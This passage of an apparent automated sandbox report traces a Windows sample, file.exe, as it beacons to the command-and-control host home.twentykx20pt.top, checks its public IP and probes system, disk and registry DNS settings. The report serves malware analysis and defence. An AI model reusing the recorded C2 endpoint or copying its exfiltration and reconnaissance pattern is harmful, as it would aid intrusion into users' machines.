Data Ascii: WcNR5KFGjKbxFKEJTrYidOWJxVWWGoxnXrVKjV5SZ\/buS+EXFHCWQYDK6+c0+LMThKU41cx5PqOIr81apVjGOErVKkKVDDwnHD4ajDF1nChRpwjZKMV8o\/tDX\/AJPhfR9PViGvtaE7AYw0NjZ3AdTnn\/XXVu\/HdBzjg\/H+3bxjHf1r6J\/aK1W0uPEGhaNb39jeSaZp93cziyuorpYpdQuUhMcjQs4jlC6cjNDIElRWRm
Nov 28, 2024 13:09:05.065371990 CET | 2472 | OUT | Data Raw: 2b 72 63 39 4c 44 30 5c 2f 5a 65 33 34 49 7a 39 56 62 65 77 70 55 75 62 6e 39 68 53 76 7a 38 31 75 52 63 74 72 79 76 2b 66 5c 2f 54 47 79 6a 4c 73 71 2b 6a 48 34 70 5c 2f 32 66 68 59 59 62 32 36 34 49 39 72 79 53 71 53 35 5c 2f 5a 65 49 50 43 33
Data Ascii: +rc9LD0\/Ze34Iz9VbewpUubn9hSvz81uRctryv+f\/TGyjLsq+jH4p\/2fhYYb264I9rySqS5\/ZeIPC3s7+0nO3L7SdrW+LW9lb8c2XPI61FViiv9gz\/Bgr0VJJ2\/H+lRfxp9TQaU+vyPqb9hxdn7YX7NTZ\/5rJ4FHT+9rlqvr71+8Pibxdafsf8A\/BUbxL48+JVxFofwZ\/bm+HXgjw5pvxBv2SDQPDfxi+FWmaZ4Y0n
Nov 28, 2024 13:09:05.185058117 CET | 4944 | OUT | Data Raw: 6b 36 31 4e 34 37 75 76 2b 46 61 33 57 71 65 47 37 7a 5c 2f 41 49 53 53 58 54 78 71 66 6a 48 5c 2f 41 49 52 58 37 50 72 55 55 45 65 75 58 35 6a 2b 30 5c 2f 43 48 68 50 77 37 34 43 38 4a 2b 46 5c 2f 41 33 68 44 53 72 66 51 76 43 66 67 76 77 37 6f
Data Ascii: k61N47uv+Fa3WqeG7z\/AISSXTxqfjH\/AIRX7PrUUEeuX5j+0\/CHhPw74C8J+F\/A3hDSrfQvCfgvw7ovhPwvolo0z2uj+HfDmm22j6JpVs1xLNcNb6fptnbWkLTzSzGOFTLLI5Zj0VfS0qChCmnKblGNNO1atyc0IpaQ51FRfWPKoy+0mf1RlWQUcBhMBTq18fPE4XD5fCr7POM4+pyr4HDwpfusJLGxw0MNOSk54aOHhQrx
Nov 28, 2024 13:09:05.185082912 CET | 2472 | OUT | Data Raw: 6e 72 61 33 45 73 4a 6c 51 6d 4a 6e 74 59 5a 43 68 55 76 46 47 78 4b 44 38 52 77 76 67 33 39 48 62 42 38 58 63 6c 44 67 5c 2f 68 50 5c 2f 57 53 74 67 35 5a 70 48 4b 36 30 38 54 69 73 42 39 54 70 31 36 64 43 57 4b 6f 5a 44 69 73 56 57 79 43 6c 47
Data Ascii: nra3EsJlQmJntYZChUvFGxKD8Rwvg39HbB8XclDg\/hP\/WStg5ZpHK608TisB9Tp16dCWKoZDisVWyClGFepSp\/uMBCcJThaKUot\/0ZjPH36VOYcCuWI4+46\/1Rw2Pp5NUznD08Lgsz+v4nDYjE08FieJsHgsPxRXnWw2FxNRfWMzqQnCjVvJuLR6NJNBN80yosuMEkljxnAycnA9O3OOahNrbv\/qp8ez44\/wAa1\/COh
Nov 28, 2024 13:09:05.185106039 CET | 2472 | OUT | Data Raw: 78 6e 2b 50 70 35 62 6c 74 4c 45 59 50 43 79 78 4e 57 46 61 6f 6e 69 73 78 78 64 48 41 59 48 44 30 36 57 48 70 31 71 39 57 76 69 38 62 69 4b 47 47 6f 55 71 56 4f 63 36 6c 61 72 43 45 59 74 79 52 76 77 78 77 72 78 42 78 6c 6d 30 4d 6a 34 5a 79 79
Data Ascii: xn+Pp5bltLEYPCyxNWFaonisxxdHAYHD06WHp1q9Wvi8biKGGoUqVOc6larCEYtyRvwxwrxBxlm0Mj4ZyyrmuaTw2Lxiw1KpQo8mEwGHqYvHYqtXxVWhhqGGwmFpVK+Ir161OlSpQlOclFNmNX6ifsTf8FJj+xz8K\/EHwzHwZHxHGveP9U8dnWj8Q\/wDhDzZvqfh3wt4eOlDT\/wDhBvFP2lYU8LpeC++22xdr57b7GothcXH
Nov 28, 2024 13:09:56.630199909 CET | 214 | IN | HTTP/1.1 504 Gateway Time-out
content-length: 92
cache-control: no-cache
content-type: text/html
connection: close
Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.54978834.118.84.150804688C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 28, 2024 13:09:57.481044054 CET272OUTPOST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1
                                                Host: home.twentykx20pt.top
                                                Accept: */*
                                                Content-Type: application/json
                                                Content-Length: 128
                                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
                                                Nov 28, 2024 13:09:58.934475899 CET353INHTTP/1.1 404 NOT FOUND
                                                server: nginx/1.22.1
                                                date: Thu, 28 Nov 2024 12:09:58 GMT
                                                content-type: text/html; charset=utf-8
                                                content-length: 207
                                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.5 | 49704 | 18.213.123.165 | 443 | 4688 | C:\Users\user\Desktop\file.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-11-28 12:09:02 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                Host: httpbin.org
                                                Accept: */*
                                                2024-11-28 12:09:02 UTC | 224 | IN | HTTP/1.1 200 OK
                                                Date: Thu, 28 Nov 2024 12:09:02 GMT
                                                Content-Type: application/json
                                                Content-Length: 31
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-11-28 12:09:02 UTC | 31 | IN | Data Ascii: { "origin": "8.46.123.228"}



                                                Target ID: 0
                                                Start time: 07:08:56
                                                Start date: 28/11/2024
                                                Path: C:\Users\user\Desktop\file.exe
                                                Wow64 process (32bit): true
                                                Commandline: "C:\Users\user\Desktop\file.exe"
                                                Imagebase: 0x530000
                                                File size: 4'490'752 bytes
                                                MD5 hash: 2BA6FE9428DA32103BB44C955939208D
                                                Has elevated privileges: true
                                                Has administrator privileges: true
                                                Programmed in: C, C++ or other language
                                                Reputation: low
                                                Has exited: true


                                                  Execution Graph

                                                  Execution Coverage:2.7%
                                                  Dynamic/Decrypted Code Coverage:33.6%
                                                  Signature Coverage:11.4%
                                                  Total number of Nodes:405
                                                  Total number of Limit Nodes:53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                  • API String ID: 0-1590685507
                                                  • Opcode ID: d436e1d7398bdf4f31a3e0145b557ed7bd8cc55ef1ad72b6fb5066814fbfe701
                                                  • Instruction ID: 4eda57c7b53bc89b89e2c4dcd5d89549f19a410a49115ea1cd2060fb9ee98626
                                                  • Opcode Fuzzy Hash: d436e1d7398bdf4f31a3e0145b557ed7bd8cc55ef1ad72b6fb5066814fbfe701
                                                  • Instruction Fuzzy Hash: BCC29F31A043459FD724CF28D485B6ABBE1BF84314F05CA6DEC999B2A2D771ED84CB81

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemInfo.KERNELBASE ref: 00532579
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 005325CC
                                                  • GetDriveTypeA.KERNELBASE ref: 00532647
                                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 0053267E
                                                  • KiUserCallbackDispatcher.NTDLL ref: 005327E2
                                                  • FindFirstFileW.KERNELBASE ref: 005328F8
                                                  • FindNextFileW.KERNELBASE ref: 0053291F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                  • String ID: ;%S$@$`
                                                  • API String ID: 3271271169-799580559
                                                  • Opcode ID: 1cdd1b7cb7726aa16dac8340b81a5808cb9b17d71273c06573b4e4a1c3fa756c
                                                  • Instruction ID: 8c4d2ba2d4c296c54ec251adb997d44d62f0c0ffa221f332f5504ce474aba479
                                                  • Opcode Fuzzy Hash: 1cdd1b7cb7726aa16dac8340b81a5808cb9b17d71273c06573b4e4a1c3fa756c
                                                  • Instruction Fuzzy Hash: 2AD18EB49057199FCB10EF68C99569EBBF0FF88354F00896DE89897311E7349A84CF92

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                  • String ID: 0
                                                  • API String ID: 2406880114-4108050209
                                                  • Opcode ID: 53bc78cce8fe72b0a8e4c7a3c129f75b89f61f9692518ba743b69582a5791b45
                                                  • Instruction ID: d8fd39c9c0dadb2828acc367c5cf49b05b90231a13272873230b56fc8b7faf59
                                                  • Opcode Fuzzy Hash: 53bc78cce8fe72b0a8e4c7a3c129f75b89f61f9692518ba743b69582a5791b45
                                                  • Instruction Fuzzy Hash: 5BE1C3B0905719DFCB10EF68D98569EBBF4BB44354F50886EE888DB350EB749A84CF42

                                                  APIs
                                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00540712
                                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 005409DC
                                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005409FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: EventSelect$EnumEventsNetwork
                                                  • String ID: N=S$multi.c
                                                  • API String ID: 2170980988-3590082083
                                                  • Opcode ID: f94d9c6fe1394128e56a6b012764942da692e46a25e885ec29164aeda94b0a56
                                                  • Instruction ID: 5f56ef9819c945003aa57e9a02e13577c740970b949651021804ec67237402ca
                                                  • Opcode Fuzzy Hash: f94d9c6fe1394128e56a6b012764942da692e46a25e885ec29164aeda94b0a56
                                                  • Instruction Fuzzy Hash: BBD1D0716083069FE710CF60C985BAB7BE5FF94308F14582CFA8587292E774E955CB92

                                                  APIs
                                                  • getsockname.WS2_32(-00000020,-00000020,?), ref: 005FB2B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: getsockname
                                                  • String ID: ares__sortaddrinfo.c$cur != NULL
                                                  • API String ID: 3358416759-2430778319
                                                  • Opcode ID: d031358327d62094efb27e2a8a5a0870f94c7e18b1f1478b196ede08bec14d9d
                                                  • Instruction ID: 9a39732d106c9a3983e4c5bde924468ada26ad1eddb254b300c8e2b779d84bc3
                                                  • Opcode Fuzzy Hash: d031358327d62094efb27e2a8a5a0870f94c7e18b1f1478b196ede08bec14d9d
                                                  • Instruction Fuzzy Hash: A9C16071604309DFE714DF24C884A7A7BE2FF88304F158968EA458B3A1EB39ED45CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6ee8be946c0275690d6c21a591340d451c13f229f6afb23fe0808844530ade6
                                                  • Instruction ID: 0ad4e4aa58dbd1fff085f12766dbaf25af9fc08d77369bfb5fb53de19e255c73
                                                  • Opcode Fuzzy Hash: f6ee8be946c0275690d6c21a591340d451c13f229f6afb23fe0808844530ade6
                                                  • Instruction Fuzzy Hash: 4D91F23060D34E8BD7358A2888847FB7AD9FFC8368F149B2CE8A8431D4EB759C40D681
                                                  APIs
                                                  • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,005E712E,?,?,?,00001001,00000000), ref: 005FA90D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: recvfrom
                                                  • String ID:
                                                  • API String ID: 846543921-0
                                                  • Opcode ID: 49cbef263b2362c17b4f98668aa269960608c7c29f056254c2f521b6d9caf50e
                                                  • Instruction ID: 3ffeae82db4188309087b8b8da00bbc867b024ffc657f54cd22204c76836bbef
                                                  • Opcode Fuzzy Hash: 49cbef263b2362c17b4f98668aa269960608c7c29f056254c2f521b6d9caf50e
                                                  • Instruction Fuzzy Hash: 99F049B5108308AFD2109A01DD48D7BBBEDFBC9754F05896DF94C132118270AE108AB2
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005EAA19
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005EAA4C
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 005EAA97
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005EAAE9
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005EAB30
                                                  • RegCloseKey.KERNELBASE(?), ref: 005EAB6A
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 005EAB82
                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 005EAC46
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 005EAD0A
                                                  • RegEnumKeyExA.KERNELBASE ref: 005EAD8D
                                                  • RegCloseKey.KERNELBASE(?), ref: 005EADD9
                                                  • RegEnumKeyExA.KERNELBASE ref: 005EAE08
                                                  • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 005EAE2A
                                                  • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005EAE54
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005EAF63
                                                  • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005EAFB2
                                                  • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 005EB072
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$Open$CloseEnum
                                                  • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                  • API String ID: 4217438148-1047472027
                                                  • Opcode ID: e4be777b5b2c6711bc9a1d21101c47a949b87320f1f9912d30eeb8ae2133d4ec
                                                  • Instruction ID: 60dbaa484d1eccc11e72e6d77463b75ebd4f77a42c83bb450b06dd199ddb5975
                                                  • Opcode Fuzzy Hash: e4be777b5b2c6711bc9a1d21101c47a949b87320f1f9912d30eeb8ae2133d4ec
                                                  • Instruction Fuzzy Hash: D572B0B1608341ABE7249B35CC81F6B7BE8BF85740F144829F985D72A1EB71E944CB63
                                                  APIs
                                                  • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0056A831
                                                  Strings
                                                  • cf-socket.c, xrefs: 0056A5CD, 0056A735
                                                  • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0056A6CE
                                                  • Local Interface %s is ip %s using address family %i, xrefs: 0056AE60
                                                  • bind failed with errno %d: %s, xrefs: 0056B080
                                                  • @, xrefs: 0056AC42
                                                  • Name '%s' family %i resolved to '%s' family %i, xrefs: 0056ADAC
                                                  • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0056AD0A
                                                  • Trying %s:%d..., xrefs: 0056A7C2, 0056A7DE
                                                  • Could not set TCP_NODELAY: %s, xrefs: 0056A871
                                                  • @, xrefs: 0056A8F4
                                                  • Trying [%s]:%d..., xrefs: 0056A689
                                                  • Couldn't bind to '%s' with errno %d: %s, xrefs: 0056AE1F
                                                  • Bind to local port %d failed, trying next, xrefs: 0056AFE5
                                                  • Local port: %hu, xrefs: 0056AF28
                                                  • cf_socket_open() -> %d, fd=%d, xrefs: 0056A796
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: setsockopt
                                                  • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                  • API String ID: 3981526788-2373386790
                                                  • Opcode ID: abcb563775a6162e7873951f1450423269569bc3eb8ea511a0a0e00e1bec1fa7
                                                  • Instruction ID: 7f0205b0f996ce3b43bf5f260f21c372ef2448eae65d5e0b0519dee33d1d1fe7
                                                  • Opcode Fuzzy Hash: abcb563775a6162e7873951f1450423269569bc3eb8ea511a0a0e00e1bec1fa7
                                                  • Instruction Fuzzy Hash: 2162D171508341ABE7218F24C846BABBBF4FF95314F044929F988A7292E771E945CF93

Control-flow Graph: function entry 5f9740 (interactive graph, blocks coloured Executed / Not Executed; API blocks: 5f9914-5f994e RegOpenKeyExA, 5f995a-5f9992 RegQueryValueExA and RegCloseKey)
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005F9946
                                                  • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 005F9974
                                                  • RegCloseKey.KERNELBASE(?), ref: 005F998B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: same dump list as the first Memory Dump Source entry above
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                  • API String ID: 3677997916-615551945
                                                  • Opcode ID: d7971e50c218cc1b959db03ea66f1b191e7daccf9d71ba3ed0a9e9f9d2849a75
                                                  • Instruction ID: 715c8dc51c15dce212d51bfce48c9bc846422121f9c10cadadf6193cbd0881d5
                                                  • Opcode Fuzzy Hash: d7971e50c218cc1b959db03ea66f1b191e7daccf9d71ba3ed0a9e9f9d2849a75
                                                  • Instruction Fuzzy Hash: 8332C7B5900646ABEB11AB21AC46B3B7ED9BF84314F084834FA49D7263F725ED14C793

Control-flow Graph: function entry 568b50 (interactive graph, blocks coloured Executed / Not Executed; API blocks: 568c1f-568c30 connect, 568cd9-568d16 SleepEx)
                                                  APIs
                                                  • connect.WS2_32(?,?,00000001), ref: 00568C30
                                                  • SleepEx.KERNELBASE(00000000,00000000), ref: 00568CF3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: same dump list as the first Memory Dump Source entry above
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Sleepconnect
                                                  • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                  • API String ID: 238548546-879669977
                                                  • Opcode ID: a8749c86145bc05ab4e51a3f78d4800fd80192fe50a5fba871dc635257e6455d
                                                  • Instruction ID: bb001210a2cfa93e1b359172e74ea95a5669f188e61c2d81258353cbef82c1ee
                                                  • Opcode Fuzzy Hash: a8749c86145bc05ab4e51a3f78d4800fd80192fe50a5fba871dc635257e6455d
                                                  • Instruction Fuzzy Hash: C5B1B270604706AFEB20CF24C989BB67FE4BF45318F148A28E8595B2E2DB71EC54C761

Control-flow Graph: function entry 532f17 (interactive graph, blocks coloured Executed / Not Executed; API blocks: 532f91-532ff4 RegOpenKeyExA, 53315c-5331ac RegEnumKeyExA, 533010-533083 RegOpenKeyExA, 533089-5330d4 RegQueryValueExA, 53313b-53314b and 5331b2-5331c2 RegCloseKey)
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
• Associated: same dump list as the first Memory Dump Source entry above
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: CloseEnumOpen
                                                  • String ID: d
                                                  • API String ID: 1332880857-2564639436
                                                  • Opcode ID: dfca4f7c9938c4bb5e3c481e364f5d99bda4a24627fcb2d547d99fccc58868a2
                                                  • Instruction ID: 53cd78a54d9b218a540896876c12da1f8c17b2ae3059275715bc08a3efa0e331
                                                  • Opcode Fuzzy Hash: dfca4f7c9938c4bb5e3c481e364f5d99bda4a24627fcb2d547d99fccc58868a2
                                                  • Instruction Fuzzy Hash: 887194B49047199FDB10EF69C98579EBBF0BF84318F10C85DE89897311E7749A888F92

